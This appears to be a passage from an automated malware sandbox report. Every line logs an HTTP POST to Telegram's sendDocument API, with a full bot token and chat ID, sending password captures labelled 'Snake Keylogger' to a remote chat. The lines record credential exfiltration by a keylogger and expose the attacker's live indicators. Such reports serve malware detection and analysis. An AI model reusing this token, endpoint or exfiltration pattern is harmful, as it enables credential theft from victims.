                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255d735cde8Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255d754cacaHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255d76ca2a1Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255d7821822Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255d7a83f75Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255d7d7ede1Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255d7f489d9Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255d80c5fc7Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255d82436fbHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255d840d70dHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255d85fd29cHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255d87ed04bHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255d896a7dcHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255d8b3451cHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255d8cb1d71Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255d8ff9058Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255d917675eHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255d93d8c91Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255d95563e5Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255d972014aHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255d990fe2eHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255d9affcf6Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255d9cefbedHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255d9edf9e7Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255da0a972bHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255da226dbbHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255da416c4bHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255da56e2bfHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255da7d07f1Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255da94deb0Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255dab3dcf1Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255dad2dbd1Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255daef78f9Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255db074f2cHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255db2d74a4Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255db6b7218Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255db91981cHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255dbae3519Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255dbd459f3Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255dc197d55Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255dc3fa396Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255dc5ea195Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255dcc2c405Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255dcf010c9Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255dd0f0f14Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255dd2bac15Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255ddbd1b4cHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255dde3413eHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255de096688Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255de28f1b6Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255de403f36Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255de5cd898Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255de7bd6f1Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255de93c063Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255deb05f41Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255deca8634Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255dee894c0Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255df063068Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255df235a04Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255df4279f6Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255dffbb2a4Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255e01f7428Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255e0374e0eHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255e05df84bHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255e08abe89Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255e0a9c32aHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255e0c8baa8Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255e0e55880Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255e104567bHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255e11dd96aHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255e13b2babHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255e1615165Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255e17defe5Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255e195c4edHost: api.telegram.orgContent-Length: 407
